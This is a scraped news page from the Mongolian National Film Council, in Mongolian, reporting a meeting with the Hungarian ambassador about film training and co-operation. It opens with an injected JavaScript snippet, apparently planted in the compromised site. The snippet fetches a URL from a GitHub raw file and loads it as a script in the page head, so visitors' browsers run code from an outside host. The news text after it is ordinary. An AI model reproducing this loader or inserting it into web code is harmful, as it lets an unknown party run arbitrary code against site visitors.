;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); КИНО УРЛАГИЙН ЗӨВЛӨЛ, УНГАР УЛСЫН ЭЛЧИН САЙДТАЙ УУЛЗАЛТ ХИЙЛЭЭ - Mongolian National Film Council

КИНО УРЛАГИЙН ЗӨВЛӨЛ, УНГАР УЛСЫН ЭЛЧИН САЙДТАЙ УУЛЗАЛТ ХИЙЛЭЭ

КИНО УРЛАГИЙН ЗӨВЛӨЛ, УНГАР УЛСЫН ЭЛЧИН САЙДТАЙ УУЛЗАЛТ ХИЙЛЭЭ
КИНО УРЛАГИЙН ЗӨВЛӨЛ, УНГАР УЛСЫН ЭЛЧИН САЙДТАЙ УУЛЗАЛТ ХИЙЛЭЭ
Кино урлагийн зөвлөлийн ажлын албаны төлөөллүүд Өнөөдөр 05 дугаар сарын 17-ны өдөр Унгар улсаас Монгол Улсад суугаа элчин сайд хатагтай Др.Обрущанский Борбалатай хоёр дахь удаагаа албан уулзалт зохион байгууллаа.
Энэхүү албан уулзалтаар уран бүтээлчийн хөгжлийг дэмжих, дотоод, гадаадад сургах, мэргэшүүлэх ажлын хүрээнд Унгар улсад мэргэжилтэн бэлтгэх, цаашдын кино урлагийн салбарт хоёр улсын уран бүтээлчид хамтран ажиллах боломжийг нэмэгдүүлэх зэрэг асуудлуудыг хэлэлцэв. Мөн Унгар улсын кино дэд хорооны зүгээр кино урлагийн боловсролын салбарт дэмжлэг үзүүлж, хамтарч ажиллахдаа таатай байхаа мэдэгдсэн юм.
Уулзалтад Кино урлагийн зөвлөлийн гишүүн Б.Пүрэвдорж, Г.Энхбаяр, КУЗАА-ны Монгол кино дэмжих газрын дарга Б.Болдбаатар, КУЗАА-ны Олон нийтийн асуудал хариуцсан газрын дарга Б.Амирдаа болон Унгар улсын элчин сайд Др.Обрущанский Борбала, Унгарын ЭСЯ-ны Дэд тэргүүн Жигмонд Пөлүф, Унгар улсын кино хорооны дарга Пешти Акос, Продюсер Бергер Йожеф Аттила нар оролцлоо.
Энэ оны 01 дүгээр сарын 12-нд Монгол Кино нэгтгэл ТӨҮГ-ын байранд Кино урлагийн зөвлөл Унгар улсаас Монгол Улсад суугаа элчин сайд Др.Обрущанский Борбала болон албаны төлөөллүүдтэй гурван талт хамтын уулзалт хийж байсан юм.